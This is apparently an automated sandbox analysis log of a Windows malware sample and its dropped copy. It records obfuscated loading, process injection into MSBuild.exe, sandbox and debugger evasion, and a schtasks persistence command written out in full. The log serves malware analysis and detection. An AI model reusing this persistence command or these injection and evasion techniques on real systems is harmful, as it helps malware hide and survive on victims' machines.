                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: 41DLTjkmOm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: 41DLTjkmOm.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: 41DLTjkmOm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\Users\FAG\OneDrive\Desktop\Outputs\Wowaegok.pdb source: 41DLTjkmOm.exe, Lamsses.exe.0.dr

                  Data Obfuscation

                  barindex
                  Source: 41DLTjkmOm.exe, YCache.cs.Net Code: NanoFiles System.Reflection.Assembly.Load(byte[])
                  Source: Lamsses.exe.0.dr, YCache.cs.Net Code: NanoFiles System.Reflection.Assembly.Load(byte[])
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CB50
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeCode function: 0_2_00007FFD345800BD pushad ; iretd 0_2_00007FFD345800C1
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeCode function: 0_2_00007FFD34585A45 pushad ; retf 0_2_00007FFD34585ABD
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeCode function: 0_2_00007FFD34584220 pushad ; retf 0_2_00007FFD34585ABD
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeCode function: 8_2_00007FFD345800BD pushad ; iretd 8_2_00007FFD345800C1
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeCode function: 8_2_00007FFD34585A45 pushad ; retf 8_2_00007FFD34585ABD
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeCode function: 8_2_00007FFD34584220 pushad ; retf 8_2_00007FFD34585ABD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00457106 push ecx; ret 9_2_00457119
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0045B11A push esp; ret 9_2_0045B141
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0045E54D push esi; ret 9_2_0045E556
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00457A28 push eax; ret 9_2_00457A46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00434E56 push ecx; ret 9_2_00434E69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00406EB0 ShellExecuteW,URLDownloadToFileW,9_2_00406EB0
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeFile created: C:\Users\user\AppData\Roaming\Lamsses.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "WidgetData" /tr "C:\Users\user\AppData\Roaming\Lamsses.exe " /sc minute /mo 5 /f
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AA4A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CB50
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040F7A7 Sleep,ExitProcess,9_2_0040F7A7
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeMemory allocated: 2F20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeMemory allocated: 1AFC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeMemory allocated: 860000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeMemory allocated: 1A640000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,9_2_0041A748
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeWindow / User API: threadDelayed 641Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 413Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 9064Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: foregroundWindowGot 1715Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 6.1 %
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exe TID: 6444Thread sleep count: 641 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exe TID: 1364Thread sleep count: 322 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exe TID: 6772Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3060Thread sleep count: 224 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3060Thread sleep time: -112000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3220Thread sleep count: 413 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3220Thread sleep time: -1239000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3220Thread sleep count: 9064 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3220Thread sleep time: -27192000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exe TID: 6776Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_00409253
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C291
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C34D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_00409665
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0044E879 FindFirstFileExA,9_2_0044E879
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_0040880C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040783C FindFirstFileW,FindNextFileW,9_2_0040783C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419AF5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD37
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407C97
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: MSBuild.exe, 00000004.00000002.4670639752.00000000013D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                  Source: MSBuild.exe, 00000004.00000002.4670639752.0000000001450000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWqo
                  Source: 41DLTjkmOm.exe, 00000000.00000002.2246234093.0000000001364000.00000004.00000020.00020000.00000000.sdmp, 41DLTjkmOm.exe, 00000000.00000002.2248655300.000000001BEE8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4670639752.0000000001450000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Lamsses.exe, 00000008.00000002.2253470208.0000000000961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_004349F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CB50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004432B5 mov eax, dword ptr fs:[00000030h]9_2_004432B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00412077 GetProcessHeap,HeapFree,9_2_00412077
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_004349F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00434B47 SetUnhandledExceptionFilter,9_2_00434B47
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0043BB22
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00434FDC
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 459000Jump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 471000Jump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 477000Jump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 478000Jump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 479000Jump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47E000Jump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: ED5008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 459000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 471000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 477000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 478000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 479000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47E000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F6C008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe9_2_004120F7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00419627 mouse_event,9_2_00419627
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
